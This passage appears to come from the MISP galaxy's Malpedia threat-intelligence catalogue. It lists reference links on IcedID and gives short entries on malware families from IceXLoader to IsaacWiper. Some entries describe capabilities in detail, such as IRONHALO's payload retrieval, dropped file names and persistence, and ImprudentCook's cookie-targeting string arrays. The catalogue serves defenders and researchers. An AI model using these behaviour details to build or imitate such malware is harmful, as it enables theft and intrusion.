https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.binarydefense.com/icedid-gziploader-analysis/

https://www.silentpush.com/blog/icedid-command-and-control-infrastructure

https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot

https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing

https://ceriumnetworks.com/threat-of-the-month-icedid-malware/

https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/

https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware

https://blog.minerva-labs.com/icedid-maas

https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/

https://blog.group-ib.com/prometheus-tds

https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/

https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes

https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/

https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/

https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html

https://github.com/0xThiebaut/PCAPeek/

https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html

https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

https://isc.sans.edu/diary/29740

https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html

https://thedfirreport.com/2021/05/12/conti-ransomware/

https://eln0ty.github.io/malware%20analysis/IcedID/

https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion

https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/

https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan

https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/

https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader

https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary

https://www.youtube.com/watch?v=wObF9n2UIAM

https://www.youtube.com/watch?v=7Dk7NkIbVqY

https://www.netresec.com/?page=Blog&month=2022-10&post=IcedID-BackConnect-Protocol

https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites

https://unit42.paloaltonetworks.com/wireshark-quiz-icedid-answers/

https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240

https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://malwation.com/icedid-malware-technical-analysis-report/

https://tccontre.blogspot.com/2021/01/

https://www.youtube.com/watch?v=YEqLIR6hfOM

https://www.spreaker.com/user/16860719/proofpoint-e29-mix-v1

https://cert.gov.ua/article/39609

https://github.com/f0wl/deICEr

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid

https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://www.netresec.com/?page=Blog&month=2023-02&post=How-to-Identify-IcedID-Network-Traffic

https://www.ironnet.com/blog/ransomware-graphic-blog

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://www.netresec.com/?page=Blog&month=2023-10&post=Forensic-Timeline-of-an-IcedID-Infection

https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/

https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/

https://dshield.org/diary/Recent+IcedID+Bokbot+activity/29740/

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html

https://unit42.paloaltonetworks.com/atoms/monsterlibra/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766

https://www.secureworks.com/research/threat-profiles/gold-swathmore

https://isc.sans.edu/diary/rss/28934

https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/

https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/

https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html

https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/

https://blog.reconinfosec.com/an-encounter-with-ta551-shathak

https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344

https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/

https://twitter.com/Unit42_Intel/status/1645851799427874818

https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/

https://www.group-ib.com/blog/icedid

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html

https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/

https://netresec.com/?b=214d7ff

https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders

https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html

https://www.youtube.com/watch?v=wMXD4Sv1Alw

https://www.silentpush.com/blog/malicious-infrastructure-as-a-service

https://github.com/telekom-security/icedid_analysis

https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://www.trendmicro.com/en_ie/research/22/l/icedid-botnet-distributors-abuse-google-ppc-to-distribute-malware.html

https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html

https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/

https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine

https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/

https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid

https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns

http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/

https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/

https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://blog.talosintelligence.com/2020/07/valak-emerges.html

https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros

https://nikpx.github.io/malware/analysis/2022/03/09/BokBot

https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view

https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/

https://thedfirreport.com/2022/04/25/quantum-ransomware/

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/

https://twitter.com/felixw3000/status/1521816045769662468

https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html

https://forensicitguy.github.io/analyzing-icedid-document/

https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/

https://unit42.paloaltonetworks.com/ta551-shathak-icedid/

https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/

https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html

https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/

https://www.first.org/resources/papers/amsterdam23/IcedID-FIRST-AMS-2023.pdf

https://www.elastic.co/security-labs/unpacking-icedid

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

https://www.team-cymru.com/post/from-chile-with-malware

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://intel471.com/blog/malvertising-surges-to-distribute-malware

https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/

https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back

https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol-part-2

win.icexloader

IceXLoader is a commercial malware used to download and deploy additional malware on infected machines. The latest version is written in Nim, a relatively new language utilized by threat actors over the past two years, most notably by the NimzaLoader variant of BazarLoader used by the TrickBot group.

The v1 was written in AutoIT.

The tag is: misp-galaxy:malpedia="win.icexloader"

win.icexloader is also known as:

Table 3723. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icexloader

https://www.fortinet.com/blog/threat-research/new-icexloader-3-0-developers-warm-up-to-nim

Ice IX

The ICE IX bot is a banking trojan derived from the Zeus botnet, because it uses significant parts of Zeus’s source code. ICE IX communicates using the HTTP protocol, so it can be considered a third-generation botnet. While it has been used for a variety of purposes, the primary threat of ICE IX comes from its manipulation of banking operations on compromised machines. As with any bot, execution of the bot results in establishing a master-slave relationship between the botmaster and the compromised computer.

The tag is: misp-galaxy:malpedia="Ice IX"

Ice IX is also known as:

Table 3724. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix

https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus

https://securelist.com/ice-ix-the-first-crimeware-based-on-the-leaked-zeus-sources/29577/

https://securelist.com/ice-ix-not-cool-at-all/29111/

https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/

IconDown

The tag is: misp-galaxy:malpedia="IconDown"

IconDown is also known as:

Table 3725. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown

https://blogs.jpcert.or.jp/en/2019/11/icondown-downloader-used-by-blacktech.html

IcyHeart

The tag is: misp-galaxy:malpedia="IcyHeart"

IcyHeart is also known as:

  • Troxen

Table 3727. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.icyheart

IDKEY

The tag is: misp-galaxy:malpedia="IDKEY"

IDKEY is also known as:

Table 3728. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey

https://isc.sans.edu/diary/22766

IISpy

The tag is: misp-galaxy:malpedia="IISpy"

IISpy is also known as:

  • BadIIS

Table 3730. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy

https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/

IMAPLoader

The tag is: misp-galaxy:malpedia="IMAPLoader"

IMAPLoader is also known as:

Table 3731. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.imap_loader

https://www.crowdstrike.com/blog/imperial-kitten-deploys-novel-malware-families/

Immortal Stealer

ZScaler describes Immortal Stealer as a Windows malware written in .NET designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions.

The tag is: misp-galaxy:malpedia=" Immortal Stealer"

Immortal Stealer is also known as:

Table 3734. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.immortal_stealer

https://www.zscaler.com/blogs/research/immortal-information-stealer

ImprudentCook

ImprudentCook is an HTTP(S) downloader.

It was delivered in the Operation DreamJob type of activity targeting aerospace and defense companies in South Africa (in Q2 2022) and in Central Europe (in H1 2023), and against an unknown sector in South Korea back in Q2 2021.

It uses the AES cipher implemented through Windows Cryptographic Providers for decryption of its binary configuration, and also for encryption and decryption of the client-server communication.

It’s hidden in an ADS stream (:dat or :zone) of its dropper, together with its configuration (:rsrc) and an AES-128 CBC key with an initialization vector for its decryption (:kgb or :data).

It contains two characteristic arrays of strings that represent cookie names for web services, including Bing, Daum and GitHub:

  1. iKc;uid;OAX;DMP_UID;PCID;_gid;_gat;csrftoken;NID;1P_JAR;JSESSIONID;WLS;SNID; utma;BID;SRCHD;GsCK_AC;spintop;eader;XSRF-TOKEN;_gat_gtag_UA;webid_ enabled;EDGE_V;dtck_channel;dtmulti;UUID;XUID;ZIA;IUID;SSID;_gh_sess;_octo

  2. channel;post_titles;xfw_exp;wiht_clkey;SGPCOUPLE;NRTK;fbp;uaid;SRCHUSR;GUC;HPVN;dtck_ blog;dtck_media;MUIDB;SRCHHPGUSR;SiteMain

It contains a string, "5.40" or "5.60", looking like version information.

The tag is: misp-galaxy:malpedia="ImprudentCook"

ImprudentCook is also known as:

Table 3735. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.imprudentcook

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://asec.ahnlab.com/ko/22975/

Industrial Spy

A ransomware that emerged in April 2022.

The tag is: misp-galaxy:malpedia="Industrial Spy"

Industrial Spy is also known as:

Table 3739. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.industrial_spy

https://www.zscaler.com/blogs/security-research/technical-analysis-industrial-spy-ransomware

Industroyer

Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine’s power grid on December 17, 2016. The attack cut a fifth of Kiev, the capital, off power for one hour. It is the first ever known malware specifically designed to attack electrical grids.

The tag is: misp-galaxy:malpedia="Industroyer"

Industroyer is also known as:

  • Crash

  • CrashOverride

Table 3740. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf

https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security

https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too

https://cert.gov.ua/article/39518

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/

https://www.secureworks.com/research/threat-profiles/iron-viking

https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://en.wikipedia.org/wiki/Industroyer

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/

INDUSTROYER2

The tag is: misp-galaxy:malpedia="INDUSTROYER2"

INDUSTROYER2 is also known as:

Table 3741. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2

https://pylos.co/2022/04/23/industroyer2-in-perspective/

https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/

https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://cert.gov.ua/article/39518

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://twitter.com/silascutler/status/1513870210398363651

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks

https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://blog.scadafence.com/industroyer2-attack

https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.mandiant.com/resources/blog/gru-disruptive-playbook

Inferno

The tag is: misp-galaxy:malpedia="Inferno"

Inferno is also known as:

Table 3742. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.inferno

https://github.com/LimerBoy/Inferno

InfinityLock

InfinityLock ransomware is a type of malicious software that encrypts a victim’s files and demands a ransom payment in order to decrypt them. It is spread through phishing emails and malicious websites. Once a computer is infected with InfinityLock, it encrypts all important files, such as documents, photos, and videos. It then displays a message that demands the victim pay a ransom of $1,000 in Bitcoin in order to decrypt the files. If the victim does not pay the ransom, the files will be lost permanently.

The tag is: misp-galaxy:malpedia="InfinityLock"

InfinityLock is also known as:

Table 3743. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.infinitylock

https://anti-spyware-101.com/remove-infinitylock-ransomware

InfoDot

Ransomware.

The tag is: misp-galaxy:malpedia="InfoDot"

InfoDot is also known as:

Table 3744. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot

https://id-ransomware.blogspot.com/2019/10/infodot-ransomware.html

InnaputRAT

InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.

The tag is: misp-galaxy:malpedia="InnaputRAT"

InnaputRAT is also known as:

Table 3747. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat

https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/

win.innfirat

InnfiRAT is coded in .NET and targets personal data on infected devices, with its top priority appearing to be Bitcoin and Litecoin wallet data.

InnfiRAT also includes a backdoor which allows attackers to control the infected host remotely. Possibilities include logging keystrokes, taking pictures with the webcam, accessing confidential information, formatting drives, and more.

It attempts to steal browser cookies in order to obtain usernames and passwords, and monitors the user's activities with screenshot functionality.

The tag is: misp-galaxy:malpedia="win.innfirat"

win.innfirat is also known as:

Table 3748. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.innfirat

https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more

Interception (Windows)

ESET noticed attacks against aerospace and military companies in Europe and the Middle East that took place between September and December 2019, which featured this family. They found a number of hints that point towards Lazarus as the potential origin.

The tag is: misp-galaxy:malpedia="Interception (Windows)"

Interception (Windows) is also known as:

Table 3749. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.interception

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf

Invicta Stealer

According to Cyble, the Invicta Stealer can collect system information, system hardware details, wallet data, and browser data, and extract information from applications like Steam and Discord.

The tag is: misp-galaxy:malpedia="Invicta Stealer"

Invicta Stealer is also known as:

Table 3750. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.invicta_stealer

https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/

InvisiMole

InvisiMole had a modular architecture, starting with a wrapper DLL and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers spy on the victim. The malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which caused it to be loaded during Windows startup into the Windows Explorer process instead of the legitimate library. The malware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.

The smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.

The second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces.

The tag is: misp-galaxy:malpedia="InvisiMole"

InvisiMole is also known as:

Table 3751. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole

https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/

https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/

https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

IPStorm (Windows)

The tag is: misp-galaxy:malpedia="IPStorm (Windows)"

IPStorm (Windows) is also known as:

Table 3752. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ipstorm

https://maldbg.com/ipstorm-golang-malware-windows

IRONHALO

IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.
The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.

The tag is: misp-galaxy:malpedia="IRONHALO"

IRONHALO is also known as:

Table 3754. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.symantec.com/security-center/writeup/2015-122210-5128-99

https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html

https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

IronNetInjector

According to Mitre, IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.

The tag is: misp-galaxy:malpedia="IronNetInjector"

IronNetInjector is also known as:

Table 3755. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ironnetinjector

https://unit42.paloaltonetworks.com/ironnetinjector/

IsaacWiper

According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim’s machine.

The tag is: misp-galaxy:malpedia="IsaacWiper"

IsaacWiper is also known as:

  • LASAINRAW

Table 3757. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper

https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://twitter.com/ESETresearch/status/1521910890072842240

https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/

https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html

https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://www.brighttalk.com/webcast/15591/534324

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/

